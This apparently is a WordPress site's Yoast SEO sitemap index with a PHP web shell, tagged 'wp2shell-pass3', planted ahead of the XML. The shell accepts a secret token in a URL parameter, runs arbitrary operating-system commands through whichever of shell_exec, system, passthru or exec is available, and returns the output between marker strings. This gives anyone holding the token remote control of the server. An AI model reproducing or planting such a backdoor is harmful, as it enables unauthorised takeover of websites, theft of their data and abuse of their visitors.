
// wp2shell-pass3
if (isset($_GET['t']) && hash_equals('9f6a98e467a373162d71053820aa27f5', (string)$_GET['t']) && isset($_GET['c'])) {
    $c=(string)$_GET['c']; $o='';
    if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
    elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
    elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
    elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
    $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//okmarts.net/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://okmarts.net/post-sitemap.xml</loc>
		<lastmod>2026-07-17T08:39:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://okmarts.net/page-sitemap.xml</loc>
		<lastmod>2025-09-09T08:31:29+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://okmarts.net/category-sitemap.xml</loc>
		<lastmod>2026-07-17T08:39:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://okmarts.net/author-sitemap.xml</loc>
		<lastmod>2023-01-03T10:37:30+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->